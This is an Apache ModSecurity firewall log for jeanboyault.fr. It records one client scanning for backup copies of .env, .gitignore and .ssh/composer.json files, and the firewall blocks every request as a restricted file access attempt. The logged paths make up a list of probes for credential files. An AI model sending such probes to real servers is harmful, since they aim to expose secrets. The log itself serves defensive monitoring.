[Mon May 11 12:31:36.496772 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:25834] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.test~"] [unique_id "agGwCL4KNmD_mZ_vlf9HcQAAAEU"]
[Mon May 11 12:31:36.497195 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:25834] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.test~"] [unique_id "agGwCL4KNmD_mZ_vlf9HcQAAAEU"]
[Mon May 11 12:31:37.660331 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:25834] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwCL4KNmD_mZ_vlf9HcQAAAEU"]
[Mon May 11 12:31:37.685567 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:25846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.test~"] [unique_id "agGwCRjZymfuKpjWXeiLAAAAANM"]
[Mon May 11 12:31:37.685896 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:25846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.test~"] [unique_id "agGwCRjZymfuKpjWXeiLAAAAANM"]
[Mon May 11 12:31:38.920226 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:25846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwCRjZymfuKpjWXeiLAAAAANM"]
[Mon May 11 12:31:38.944089 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:25858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.tmp.~"] [unique_id "agGwCkYQeUtAPynIs6xnEAAAABQ"]
[Mon May 11 12:31:38.944305 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:25858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.tmp.~"] [unique_id "agGwCkYQeUtAPynIs6xnEAAAABQ"]
[Mon May 11 12:31:40.106945 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:25858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwCkYQeUtAPynIs6xnEAAAABQ"]
[Mon May 11 12:31:40.125134 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:25866] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.tmp.~"] [unique_id "agGwDERdw2n9wv6Ai48V9AAAAJY"]
[Mon May 11 12:31:40.128483 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:25866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.tmp.~"] [unique_id "agGwDERdw2n9wv6Ai48V9AAAAJY"]
[Mon May 11 12:31:41.358653 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:25866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwDERdw2n9wv6Ai48V9AAAAJY"]
[Mon May 11 12:31:41.385633 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:25874] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env/context.xml~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env/context.xml~"] [unique_id "agGwDRjZymfuKpjWXeiLAwAAAM0"]
[Mon May 11 12:31:41.386728 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:25874] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env/context.xml~"] [unique_id "agGwDRjZymfuKpjWXeiLAwAAAM0"]
[Mon May 11 12:31:42.559576 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:25874] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwDRjZymfuKpjWXeiLAwAAAM0"]
[Mon May 11 12:31:42.583935 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:25882] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env/context.xml~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env/context.xml~"] [unique_id "agGwDmS6k_SCYd1AVZq9dgAAAQg"]
[Mon May 11 12:31:42.584140 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:25882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env/context.xml~"] [unique_id "agGwDmS6k_SCYd1AVZq9dgAAAQg"]
[Mon May 11 12:31:43.796990 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:25882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwDmS6k_SCYd1AVZq9dgAAAQg"]
[Mon May 11 12:31:43.823547 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:62032] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.gitignore~"] [unique_id "agGwD0YQeUtAPynIs6xnFAAAABE"]
[Mon May 11 12:31:43.823929 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:62032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.gitignore~"] [unique_id "agGwD0YQeUtAPynIs6xnFAAAABE"]
[Mon May 11 12:31:45.001216 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:62032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwD0YQeUtAPynIs6xnFAAAABE"]
[Mon May 11 12:31:45.019497 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:62034] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore~"] [unique_id "agGwEZkIEwRJMyDaV55cXwAAAUw"]
[Mon May 11 12:31:45.019966 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:62034] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore~"] [unique_id "agGwEZkIEwRJMyDaV55cXwAAAUw"]
[Mon May 11 12:31:46.330273 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:62034] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwEZkIEwRJMyDaV55cXwAAAUw"]
[Mon May 11 12:31:48.804424 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:62060] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /.ssh/composer.json.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.ssh/composer.json.~"] [unique_id "agGwFJkIEwRJMyDaV55cbQAAAUs"]
[Mon May 11 12:31:48.805111 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:62060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.ssh/composer.json.~"] [unique_id "agGwFJkIEwRJMyDaV55cbQAAAUs"]
[Mon May 11 12:31:49.957226 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:62060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwFJkIEwRJMyDaV55cbQAAAUs"]
[Mon May 11 12:31:49.983696 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:62076] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /.ssh/composer.json.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.ssh/composer.json.~"] [unique_id "agGwFb4KNmD_mZ_vlf9HsQAAAEQ"]
[Mon May 11 12:31:49.983939 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:62076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.ssh/composer.json.~"] [unique_id "agGwFb4KNmD_mZ_vlf9HsQAAAEQ"]
[Mon May 11 12:31:51.179622 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:62076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwFb4KNmD_mZ_vlf9HsQAAAEQ"]
[Mon May 11 12:32:03.391833 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:21752] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env.production~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/angular/.env.production~"] [unique_id "agGwIxjZymfuKpjWXeiLJQAAANU"]
[Mon May 11 12:32:03.392048 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:21752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/angular/.env.production~"] [unique_id "agGwIxjZymfuKpjWXeiLJQAAANU"]
[Mon May 11 12:32:04.566355 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:21752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwIxjZymfuKpjWXeiLJQAAANU"]
[Mon May 11 12:32:04.592464 2026] [security2:error] [pid 1254328:tid 1254399] [client 185.177.72.9:21766] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env.production~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/angular/.env.production~"] [unique_id "agGwJERdw2n9wv6Ai48WEwAAAI4"]
[Mon May 11 12:32:04.593558 2026] [security2:error] [pid 1254328:tid 1254399] [client 185.177.72.9:21766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/angular/.env.production~"] [unique_id "agGwJERdw2n9wv6Ai48WEwAAAI4"]
[Mon May 11 12:32:05.808392 2026] [security2:error] [pid 1254328:tid 1254399] [client 185.177.72.9:21766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwJERdw2n9wv6Ai48WEwAAAI4"]
[Mon May 11 12:32:10.640624 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:21790] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /billing/.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/billing/.env~"] [unique_id "agGwKr4KNmD_mZ_vlf9HzgAAAEA"]
[Mon May 11 12:32:10.640834 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:21790] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/billing/.env~"] [unique_id "agGwKr4KNmD_mZ_vlf9HzgAAAEA"]
[Mon May 11 12:32:11.807748 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:21790] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwKr4KNmD_mZ_vlf9HzgAAAEA"]
